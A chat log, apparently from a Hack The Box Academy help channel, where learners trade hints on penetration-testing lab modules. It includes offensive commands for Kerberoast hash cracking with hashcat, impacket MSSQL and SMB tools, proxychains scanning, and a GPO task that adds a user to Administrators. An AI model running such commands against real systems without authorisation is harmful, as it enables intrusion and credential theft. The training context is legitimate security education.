Okay found it tysm
Can I type the result I'm getting.. Or can I post the code without the result so I can show what I'm doing. Because I'm just getting that it's wrong
no
if someone is willing it can be taken to dms
uff.. okk.. Hm then I'm stuck. Because I can't see where I'm doing it wrong..
In Pwnbox issue the $PSversiontable variable using PowerShell. Submit the edition of PowerShell that is running as the answer.
answer: 7.5.0
still says wrong answer
you sure its not 7.5.0
happened to me before it didn't accept an answer because there was a space
Hint: re-read specifically what the question is asking for
ig its not the space then😅 
correct it's not 7.5.0
the question ask for the edition
there's a nice little thing there that tells you the edition if you hadn't figured it out
i did when i read this
im always thinking inside the box
"it has to be 7.5.0 but the answer thing is broken" my mind said
I remembered this question because I remembered getting hung up on the same thing 😅
what is xxd binary ?
high level response
that's hard for me ahah Im learning alone
its ok
reread the section im pretty sure its there
env
there is a command that should show where its located
nah there something easier
Pair it with grep ?
which
Wait isnt that spoiler
Ah yes
also locate
I thought its a library not a binary
Linux Fundamentals
linux fundamentals
bro im so lost I'll try to find someone who's french to explain me in voc
One needs practicing to keep the memory updated
Module: Introduction To Assembly Language
Section: Skills Assessment (Task 2)
Section Link: https://academy.hackthebox.com/module/85/section/909
I am having a terrible time with this one. No matter what I try, I simply can't get the flag.s to produce the right Shellcode. I keep getting the Failed to run Shellcode error. I have no idea what else to try here, honestly. I would like to get this done. Can anyone help me please?
locate xxd or which xxd
both will provide answers
which <binary> tells you where a binary is located (if it's in your path)
locate will just show any path containing xxd
this is why which is better
correct
ohh
I write xxd but now im blocked in this mode
yeah but in the terminal
if you just type xxd you enter in the "interactive" mode of xxd
before u told me I wrote "xxd"
ctrl+c
ohh ty
i mean he already saw it
my bad
mb im tired
happened to me before lmao
okay I found it
congrats ig
find is helpful here; and i believe the section talks about how to discover files with extensions
so long as you're ssh into the target system, that should work
though you may want to count them
wc has a way to count lists ;)
you may also want to throw errors to the void
2> /dev/null
this is because your stderr will be flooded with "you don't have permission" messages
There we go, I feel so much better now! Time for the SOC Analyst path finally!
@cyan arch the module is above tier 0 please don't post module content, you can ask questions without spoiling content
ahh okay apologies
Im stuck on this module. I have tried all the commands from the page with the target ip and also nmap with various scripts to get any info but I don't seem to be getting anywhere.
Module name/link: FTP Footprinting, https://academy.hackthebox.com/module/112/section/1066
The question:
Enumerate the FTP server and find the flag.txt file. Submit the contents of it as the answer.
I can give more detail on what ive tried but I don't want to get the message deleted
If anyone has some tips would be much appreciated
Did you try connecting to it?
yes using ftp <ip address>
Hi . I am stuck on this question: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable for module https://academy.hackthebox.com/module/21/section/128 - bash scripting.
I keep getting the exact same error after changing multiple things. Any help? Thanks!
Well, did you log in?
Echo can add a newline character, -n prevents that, there are multiple ways to grab a variable length
${#var} or echo -n $var | wc -l
After the loop: you need to assign the $salt to the length
hey im absolutely banging my head against a wall. With the file uploads attacks skills assessment, what timezone is the htb server in? i got everything up to the last part of actually accessing my uploaded webshell. I found the source code and the dir, plus the naming scheme, but no matter what i do for the date i am getting a 404
Guys hello if someone has done cracking passwords with hashcat how to open archive I extracted hash and cracked the password but archive itself is not opening
as I understood flag is inside
i downloaded the archive clicking on it and it doesn't ask me for a password or show that it is locked with a password
unzip in command line
Eu/uk gmt
awesome thank you
No, because vhd wouldn't be the encryption
file file.vhd
ok makes sense
It's not about windows prompting for elevation
thanks, i've got it now, it was to do with the newline character, i believe I did something similar to echo -n $var | wc -l
like when I tried to open on target machine, Windows local Administrator prompt came up
I just need to mount on linux
Thats because mounting drives requires admin permissions
The file is still password protected
There is a 2john that will be helpful, but you gotta discover the encryption and hashing in use
grrrr its still not working. I got the base64 encoded response in burp showing it uploaded, and im in the right file dir but i cant for the life of me get it to come up
spent a whole day on it
Run the command in php to show you what the filename command does
goood idea ok
In the leaked upload.php it does something to mutate the filename
yeah i found the source code for that
one sec
the heck
yeah im putting that in and it still comes up as 404
im so confused lol
hmmmm
yea found it, pretty neat didn't know you could crack that
I guess on a real enterprise system the encryption would take much longer
when i try to unzip the archive I get the following
unzip Downloads/hashcat.7z
Archive: Downloads/hashcat.7z
End-of-central-directory signature not found. Either this file is not
a zipfile, or it constitutes one disk of a multi-part archive. In the
latter case the central directory and zipfile comment will be found on
the last disk(s) of this archive.
unzip: cannot find zipfile directory in one of Downloads/hashcat.7z or
Downloads/hashcat.7z.zip, and cannot find Downloads/hashcat.7z.ZIP, period.
that means archive is corrupt or what?
Web Attacks
Mass IDOR Enumeration
https://academy.hackthebox.com/module/134/section/1186
It's only one question but I can't seem to curl the uid of the other users
Is anyone having an issue with the attacking sequel databases module in the attacking common services topic for the CPTS? I’m using Sqlcmd and it refuses to connect. I was able to once, but there was no data in any of the tables
@flint palm That error means that the file you're trying to unzip isn't actually a ZIP file — it's a .7z file, which is a different archive format used by 7-Zip. You're using the unzip command, which only works for .zip files. To extract a .7z file, you need to use a tool that understands that format.
sudo apt install p7zip-full
7z x Downloads/hashcat.7z
Thank you
Anyone good with binary exploitation ?
No, I get this, am i missing something?
try restarting your target or checking if it's still up in academy
Hello, I'm a beginner and currently following the "Path Information Security Foundations". I've tried several times, but in the part where you need to set up your first Parrot lab (which I chose to do on VirtualBox), I don't understand why I get no result when I type the command cat tools.list.
The system replies:
cat: tools.list: No such file or directory.
I don't want to move forward without understanding this
worked, thanks alot
the file "tools.list" doesn't exist. You can't read the contents of a file that doesn't exist
I thought it was supposed to exist since, while following the module, they show the command without really explaining what to do. So I spent quite a bit of time trying to research and test things, but now it's clearer thanks to your explanation. Thank you!
They show a file with a list of things "tools.list" but it's not a default file
It wasted a lot of my time. I need to focus better from now on.🤣
Anyone having issues too with the attacking SQL database’s module?
what exactly is your issue?
can connect to the lab (Attacking Common Services Attacking SQL Databases ), but there's no user table. I've already answered question 1. I've been talking to support all morning and I'm still getting nothing, but problems. Went over the SMB module and the SQL module for the past 6 hours to see if I missed something and I'm still getting the same issue. MSSqlsvc user password doesn't work to login. There's only the same 6 rows (master, tempdb, model, msdb, hmaildb, and flabDB.) 3 I have no access to (flagDB, hmaildb, & model). Master, tempdb, and msdb I can and there are tables, but there's nothing in any of them. master(spt_fallback_db, spt_fallback_dev, spt_fallback_usg & spt_monitor)
tempdb is empty
msbd (dm_hadr_automatic_seeding_history, backupmediaset, backupmediafamily, backupset, backupfile, restorehistory, restorefile, restorefilegroup, logmarkhistory, suspect_pages)
You should be able to log in with the svc user
Tried that. Keep getting a mssql: login error: Login failed for user 'mssqlsvc'. error.
well if it's a local account, you may need to take that into consideration 😉
mssqlclient.py --help
Do I switch users in my current session? I went back and tried xp_cmdshell, writing a local file, reading a local file in sql, impersonating a user and there are no other users, and nothing.
One sec while I try that
you can just log with mssqlsvc
sudo python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py mssqlsvc@10.129.203.12
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 96, in <module>
ms_sql.connect()
~~~~~~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 540, in connect
sock.connect(sa)
~~~~~~~~~~~~^^^^
OSError: [Errno 113] No route to host
no route to host
are you connected to the vpn? and by extension, is the host up?
yes, it asks for the password before attempting a connection
Yes. I've used both my VPN TCP & UDP, used the pwnbox and the errors are consistent no matter what I use
well OS error isn't anything to do with the target itself, at least not directly
you're getting a "no route to host" error => it's not able to connect at all; not that the target isn't accepting the password, which would be a different auth error
do you only have 1 vpn running; are you using the pwnbox at the same time as the vpn (if so, don't)
Yup. I've been alternating and not running multiple connections. I did do that yesterday, which I thought was my problem, but today I've been testing 1 at a time
change vpn regions -> respawn target -> (there's -windows-auth for mssqlclient that tells it to use local authentication)
finally it worked! Many thanks for the help
Hello!
Module: Pivoting, Tunneling, and Port Forwarding
Exercise on Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling
I'm unable to scan with proxychains nmap during the exercise, though xfreerdp and msfconsole work fine with proxychains. Nmap returns no results for any query, even with full TCP scan flags.
Why is it not working?
try to add the -v flag to your nmap scan, maybe something will show up
also, windows defender blocks pings so maybe try to add -Pn to your scan
If your question is related to a module, just ask it here.
i need help with binary exploitation rightnow anyone can help please
Best to say the module/section/question you're stuck on.
Has anyone that has completed citrix breakout know what the issue is here? The created admin does not have the ability to execute the UAC bypass script as illustrated in the provided solution.
Double check your command in comparison to the module, it's not the same.
Also ensure all prerequisite steps were followed.
@ruby aurora please read the #rules and do not DM users without permission
Question about the NFS footprinting
when doing the mount cmd against the target is it best to just grab the whole directory and dig for the flags or could you just grab require sub folders?
i dont really need help, it's a best practices type question
I am not sure if this is the right chat, but I am trying to do the Module Linux Fundamentals.
I am currently stuck on the System Information part. It is telling me to connect to the spawned target machine with ssh, but I am unable to figure out how.
if this is the wrong chat to ask this question, could someone please direct me to the correct chat?
Ok sorry
I would think it's better to grab only what is needed for the sake of avoiding exfiltrating irrelevant files that could be sensitive or trigger edr but that's just me
You will need to use the Pwnbox or your own virtual machine connected to the VPN. From there, you should be able to use the command in the terminal ssh <user>@<target ip>
Thank you. I am using the interactive terminal provided.
I clicked on the bash terminal.
how do I get the target ip?
Below the pwnbox in your browser (right above the questions) you can press "Click here to spawn the target system!" and it'll change into an IP when it's spawned
Really? The errors seem to suggest that the issue is permission related. I'm almost certain I haven't missed any steps
I'm not entirely sure, but that command is not what they provide and not what I have in my notes. You could have also missed some prerequisite steps too.
If you're referring to the last command in the screenshot ik that it is different from the provided solution. I tried this syntax because the prior command doesn't import the module as expected
Thank you very much. That did the trick.
Again, thank you.
Thanks for the reply Aeshmedai. I have tried two different mixes:
- -sn -v for host
- -v -Pn -sT for ports.
I tried a bunch of flag combos, and the only one that smiled back was -sn -Pn. Totally redundant, due contradiction, basically like high-fiving myself in a mirror—but hey, it was just for fun and desperation.
I know that the ssh command is ok, as other tools as freerdp works fine. Is only nmap
ok send me a DM and maybe i can figure it out
I am trying to do the first question: Find out the machine hardware name and submit it as the answer.
I used the uname command and it gave me Linux but it says its the wrong answer.
Try displaying more info, you can add an argument to that command to reveal more info.
I got it. Again, thank you.
This is my first real time using Linux, and am trying to learn it.
I had to add -m to uname to get it.
Hello, I need help on how to execute the vuln in PDF web application in Final Assessment of modern web exploitation techniques, I was able to configure the hosts file in webmin and also running the dnsrebinder, but still showing "internal server error", but when I restarted the dnsrebinder and reload the page, access "http://attacker.com/" only redirect the page to what should be the output to get the flag.
nvm solved it.
Hey guys, I'm working in the module "Kerberoasting - from Linux" but I can't find the way to get the password
Hey anyone have any suggestions where to start
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Should be in output files as clear text
thank you for you answer! but I was looking and trying with older password like Password123, and easy passwords but nothing
Mb was thinking of the wrong section, you have to crack the tgs hash using hashcat
Im doing that right now
hashcat -m 13100 -a 0 /home/kali/Downloads/hash.txt /home/kali/Downloads/rockyou.txt
👍
Should take like 30 seconds or less to crack, if it doesnt your hash is incorrect/malformed
I'm working in the second one too!
thank you man!
How long does it take a scheduled task created using a GPO to actually run? On the last question in the GPO section of DACL Attacks II — got a GPO task scheduled to run net localgroup Administrators INLANEFREIGHT\g*****l /add, yet the GPO doesn't do anything.
It does cover that in the module I believe
Tried using bloodyAD to GPLink the OU and still nothing.
Theres a command to force gpo to update iirc
group policy automatically updates every 30 minutes, you can update it immediately with gpupdate /force
Hello, I am on Introduction to Active Directory module.
I am stuck on AD Administration: Guided Lab Part I. I have started the instance, still not able to connect to it.
Any nudge would be helpful.
- vpn running?
- can ping target?(not all targets will respond to ping)
- correct password?(looks kinda wrong)
https://academy.hackthebox.com/module/134/section/1206
web attacks
advanced file disclosure
I can't get it to read read the flag
i got this nvm
No. That's illegal and not what this discord is about.
Web Attacks
Skills Assessment
https://academy.hackthebox.com/module/134/section/1219
I actually need this right now, I don't seem to find a foothold on this
Yes, VPN is running and password is correct.
No, I cannot ping target.
I am facing a problem at Pivoting, Tunneling, and Port Forwarding -> Dynamic Port Forwarding with SSH and SOCKS Tunneling
I followed the proper commands:
$ ssh -D 9050 ubuntu@<ip> # attack machine
$ netstat -antp # shows listening to 9050 <- attack machine
$ tail -n 4 proxychains
socks4 127.0.0.1 9050
$ proxychains nmap -v -sn 172.16.5.1-200
# response all host down
Is it a machine problem or am I doing something wrong? Tried multiple times after booting the machine, waited 5 minutes, still the same.
@cold star is the ssh service running on your PWN box instance/the target?
also what module is it?
can anyone give me the correct path to linux priv esc module: Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.
this question?
are you trying to ssh into the PWN box or a target?
Active Directory Enumeration And Attacks, Privileged Access
Okay Let me check
Got it Thanks Man, I was confused between the ip's. Sorry for wasting time
you didn't waste anyone's time
Thanks For The Help.
can anyone give me the correct path to linux priv esc module: Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.
oh i did it nvm 😄
grep -r "HTB{" / 2>/dev/null | head -20 with this command but what if i didnt know that flag should start with HTB
well you cant use grep if you dont know what to grep lol
yea great point
Ah i am stuck for quite a few days with this question of skill assessment of Hacking wordpress module
https://academy.hackthebox.com/module/17/section/64
Question- Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
hello Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?
/home/htb-student/bin:/home/htb-student/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/tmp
i got this and what is the non-default directory
Sorry been busy, if you can't ping the target try restarting your VPN, restarting the target, or changing the VPN region
Hey need help
im in the introduction to malware analysis module under code analysis, im at a part where they are explaining about the api function and like just explaining the disassembled code for that part, they are like explaining which instruction is used for 1st 2nd 3rd etc arguments for that but like it is kinda all over the place?
like in intro to assembly language it was mentioned that specific registers are used for 1st 2nd.. etc arguments but like in the case for the api function, it differs. so im not too sure if i understand it correctly now.. if someone can explain pls do T-T
or is it bc it is a disassembled code that it is like this?
The way arguments are passed depends on the calling convention
checkout the x64 calling convention documentation in microsoft it may clear things up
Hello Guys 🙂
i need your Support.
Would it be better when i start with Windows Active Directory when i do the Pentester Path "AD Enumeration & Attacks" or should i do Active Directory learn first on Tryhackme?
I think in the learning Paths on THM you dont learn to use crackmapexec.. and i want learn it directly reasonable.
What is your recommendation?
I am having a problem with HTB module Android Fundamentals Native code where it will not take the answer what am i missing for this question "What is the name of the function that returns the string inside the cpp file? (Format: FunctionName())." I thought it was this stringFromJNI()
You don't need THM
Just do HTB
thx for the fast answer 🙂
WOW U ROASTED HIM!!
What was your question?
about The XSS script. In which I was getting errors when uploading the payload in the URL
It probably contained spoilers
ohh understandable.
so where can I ask such questions?
you can ask here; just don't spoil things
i.e. my payload is still leaving behind some stuff for some reason
yep that was what was happening
okay I understand now
you may have to mess with the payload a bit to get it cleaned up
yep, I kinda figured it out.
But I guess I cannot tell what I did because spoilers right?
yes, you can't just paste your payload here
my general suggestion is look at where the payload is inserted, and work from there
alright thanks. Will try to ask better questions next time
Bumping
ICMP requests (ping) don't go through proxychains, this is what nmap uses to determine if a host is up, use the -Pn flag to assume all hosts are up, but this would make your current scan uselessly slow
Then the module have issue coz it’s literally the content I shared in my text they used -sn flag
Please can I ask someone that has completed "Detecting Attacker Behavior With Splunk Based On Analytics"? I have the correct answer, but I can't seem to get it through the way the question is asking.
Guys hello how to install hcxtools downloaded package but can't install them apt install hcxtools isn't working
the following paragraph in the section tells you that you need to be aware of the fact that Windows Defender blocks ICMP requests
and then they give you a command to enumerate the ports of a Windows target
same issue here, feel free to let me know if you figure it out.
Thanks @waxen totem and @quartz lagoon I missed out the point
hello i've been doing wordpress hacking module and i found subdomain of wp-content and it is /atom when i visited the web page file downloaded on my pc but i cannot open it and is it something that i should dig in or can anyone help? kinda stuck
Attacking AD and NTDS.dit
Got one set of creds from brute-forcing usernames and pw's - doesn't let me connect with winrm? Is this normal / expected?
Anyone have issues where sshing into the training box disconnects after the MOTD?
I'm trying to complete the challenges in Prompt Injection Attacks module Indirect Prompt Injection
Just based on the information provided, it might be a case of permissions, presuming WinRM is open on the target
Interesting, not sure what else I could do - only set of creds I got across 3 users
I'll keep looking, could've been something with the machine I suppose
I have DM'd you if that is ok
Yeah no worries man - I'm just about to clock in to work so I can check a little bit later!
Has anyone done the pentest in a nutshell module? Im trying to privesc as john like in the lesson but I'm prompted for a password for john and cannot privesc by abusing sudo privs over nano
The password for the user is mentioned in the section
omg I was entering it wrong >:)
the true hackercore aesthetic
goonsquad ive been stuck on the last flag of linux privesc skill assessment for a while may i humbly request a nudge
who here has finished android fundamental native code last question
Hi Guys extracted handshakes using cap2hccapx.bin created file with them and when cracking this file getting separator unmatched error from hashcat and no hashes loaded can anyone explain why?
hccapx file also created
hello everyone! i was wondering how does password reset poisoning work?
Footprinting : SMTP
Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
-> so i test 3 tools, metasploit and nmap and smtp-user-enum so metasploit it give correct answers but nmap and smtp-user-enum it give false results i confirm that manually
oh okay but what’s the point of this server then?
For discussion about the various HackTheBox platforms.
I am working on the FAT GET lab in the Advanced Cache poisoning, but the only parameter language is vulnerable to XSS and ref and content does not contain XSS. Also when I add the XSS in language as html body the admin never triggers the payload.
Looks like zone transfers are allowed on one but not the other? @placid haven
I got the same problem. I tried different flags and even SOCKS5. nothing works for Nmap. However it works for xfreerdp connection and you can get your flag
when use -sT flag make sure you use sudo
eg:
$ sudo proxychains nmap -v -Pn -sT 172.16.5.19
it will work perfectly fine.
The power of SUDO... thanks for that. I tried and it worked. Still having the problem for host discovery. I am on socks5
I really want to be a hacker. But ain't know what my actual goal is or where my path is. I learned some networking in youtube videos and something somewhere of something like not the dots connected.
I worked as java backend for 3 years to make a base what actually i want to hack. Now i want to go back to my passion and career in cyber security etc etc.
But I don't know where to start or anything.
Like there is a blank way but the goal is hacking.
Like mr Robot or something.
Anyone pro here suggest some talk?
(Dear script kiddies, don't try it with an opportunity to hack my with reverse engineering or something that will break my system and heart) 🖥️💔
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
so no one here is a hacker ?
What does that have to do with what this discord was created for?
works just fine for me. Does your payload point to the correct vHost?
if you would like, post the full GET request using the spoiler tags otherwise just dm me.
I'll dm you in a minute
@placid haven i understand you tried using spoiler tags: this is a reminder, they don't do shit, best practice is to just mask the answer/subdomain you provide instead. I deleted your messages
Hey guys, I'm stuck here looking the way to get the password!, please any idea or way I appreciate it!. I'm working in the module Kerberoasting - from Linux with the first question
that's a section from the module AD Enum and attacks
yes
Module == the book; Section == the page (for analogy, and future reference)
the section itself isn't the module
oh sorry
umm i RDPed to the machine and found it like this
like bruh how did the machine even manage to connect to google search
bing watever
is that normal behavior
i dont usually find machines with a woman holding a dog background and searching tabs open lol
Woof
just put the flag in the text box bro
the question is the hostname but bruh what is this
what machine and what lab? lol
lol great place to try that one
Anyone done the new captive portals module?
@viscid osprey don't spoil the module is above t0
but to answer your question; don't always trust what nmap tells you
yeah it directly involved the service you interact with
```
└─# ./smbserver.py haji /tmp
Impacket v0.11.0 - Copyright 2023 Fortra
Traceback (most recent call last):
  File "/opt/tools/impacket/./smbserver.py", line 60, in <module>
    logger.init(options.ts, options.debug)
TypeError: init() takes from 0 to 1 positional arguments but 2 were given
```
is that correct syntax for smbserver.py script
Remove options.ts or options.debug from logger.init method.
lemme try
You should have only options.debug.
Guys hello if someone has passed module hacking passwords with hashcat there is such an assessment to make Perform MIC cracking using the attached .cap file. I used one of hashcat-utils extracted hashes from cap file but during attempts to crack it it tells me separator unmatched
what could be the problem?
pls help
i did
wthellll
i wasted like 2 hrs doing the brute force 5 times in ffuf thinking there may be another host or something this is frustrating i need to sleep i brain is not braining
well said brain is not braining))
Alright so I'm doing the Linux Fundamentals module, and one of the questions is leaving me utterly baffled because I just don't know what it's asking me to do
Good afternoon, how are you?
||I've tried 2 different answers and I'm utterly lost. I did dpkg list | wc -l, and apt list --installed | wc -l ||
both results were incorrect
so I just don't know what it's asking me for
ik it's worth 0 so I can just skip it but I'm being perfectionist because I'm silly
@distant orbit Do you need help with something?
yeah
Are you sure it’s not grabbing any other output?
I might list a little more than just the packages
oh actually good point.
wc -l counts by line right?
or is it by space?
im asking questions I can just look up
yeah it does
anyway I solved it, I had to exclude the first line
ty lattice
Off-by-one errors
anyway submitted ticket hcxpcapngtool says there are no hashes in cap file
Hey, how do I connect to the windows target for Linux Fundamentals from my macbook? I tried to set up rdp but it refused to connect. thanx
hcxpcapngtool cracking_pmkid_question2.cap -o <call it whatever>
there is a first question where user is asked to make a mic attack i tried hcxpcapngtool but when i try to extract hash for cracking it tells me there is no hash in the cap file
and yes i use m 22000 not 2500 as many do
Yeah, my bad I just realized you were asking for the first one
Two seconds let me redo it
hcxpcapngtool -o name_it_whatever.hccapx corp_question1-01.cap
hashcat -m 22000 <name of hccapx> and then list
hi
separator unmatched error
I'm newbie in cybersecurity
Literally worked for me 2 seconds ago
Online WPA/WPA2 handshake extraction
Who know nmap ?
just ask your question; what academy module is it related to?
When I scan an IP I want to be anonymous so I put a VPN but the problem is that the VPN ports are displayed how to do it?
that's not something covered by htb academy; read and follow #welcome to access more of the server.
short answer is that nmap needs to have the scans call back to it in order to be useful
so there's no way to do an "anonymous" scan
at least not in the way that you want to do it
thank you Marcie file created online worked
hashcat-utils created file was not working
Is there a way to bypass a firewall?
what academy module is this for? :)))
Idk
if it's not related to an academy module: then you're asking in the wrong channel
Hello, i have applied for a student ticket and it's been more than 48 hours and i haven't received any email yet. Can anyone help me regarding it?
you'll have to be patient
only support staff
what's the maximum time they’ll take to respond?
it depends, but they have to do verification checks to ensure your student email is legitimate and the institution does exist and things like that
Ok thanks 👍🏻
In the Android module first question on the skill assessment: Install myapp.apk by dragging and dropping it into the emulator. Then, open the embedded terminal in Android Studio and run adb root && adb shell ls -l /installed/apps/. Replace /installed/apps/ with the correct path to find the app’s home directory. What is the full path to myapp's home directory?
What is the path format? because I am pretty sure it goes something like this "/folder/folder/myappName/"
I tried "/folder/folder/" still not correct
hey guys does someone know where i can download the wordlist for gobuster? im new in this and i have no idea where to find it
you mean rockyou.txt?
no in the module they use common.txt
yeah but when i type the command gobuster dir -u http...... -w and then the wordlist path it cant find the common.txt
getting started
You have to download SecLists
It is a large public database for wordlists
here is the link for it https://github.com/danielmiessler/SecLists.git
Use the command "git clone https://github.com/danielmiessler/SecLists.git"
ok thank you i will try
This will install the db locally then you can use this path seclists/Discovery/Web-Content/common.txt
gl
yeah thanks it worked
anytime
If there any reviews about Parameter Logic Bugs module please share with me , here or DM
Thx.
SecLists has a common.txt that's roughly the same that will have the same word
as in; what specifically are you looking to get from it. since it's a t3 module not much can be shared publicly about its contents
SSRF Basic Filter Bypasses - Modern Web attacks.......any hints on if the attack is dns resolution or obfuscation for this one. The script provided doesn't allow http redirect, but I feel like I've tried every combination of things without going outside the scope of what is being taught in this specific section. Just need a nudge in the right direction to shift my thinking
hey all, im looking to start learning Python and found the Python3 intro course on HTBA, I have no experience with python and minor experience with coding. Would this be a good program to start learning or should I look elsewhere to learn the basics? Thanks
it's a decent starting off point
i'd also look into 'automate the boring stuff with python' by Al Sweigart
i'm stuck on this module for hours
wat is that?
didn't know HTB has a separate discord for module help
is that even a thing?
I’m having trouble with the Injection Attacks Skill Assessment. I found the server side xss, but I’m not sure how to enumerate the internal ports? I tried but I got many ports with successful response, but the pdf showed nothing when I downloaded it. Could any one give me a nudge?
there is no official separate Discord for module help
there was a guy that sent me a discord link
That's a scam.
You should leave if you joined the one they sent you to and stop talking to anyone from that discord.
already did
Does googling take away from learning while doing the modules? I'm a complete beginner so I google a lot of things while going through the modules and I wonder if I'm not doing them effectively
nope
the short answer is no; googling doesn't take away from learning
sometimes things aren't presented in a way that meshes well with you; so you do some extra research
so long as you're not googling "X module Y section HTB academy" for answers, then you're fine
I haven't done HTB Academy in a week and I completed the second cluster of sections in the Pivoting, Tunneling, and Port Forwarding Module. Tomorrow, I'm starting the Socat Redirection with a Reverse Shell section and I am scared I will have forgotten the information from the first few sections of the module. I was having medication issues for a couple of weeks.
did you take notes?
yes
but some of my notes are on my lenovo
which is being repaired due to hardware issues
and may be in the shop until next Friday or whatever
so I am temporarily without notes
except the most recent section that I took notes on on my macbook
my obsidian doesn't sync notes across devices
ya
I installed separate obsidian on my macbook
should I go onto the next section and not worry about it?
well, i like to believe discipline beats memory
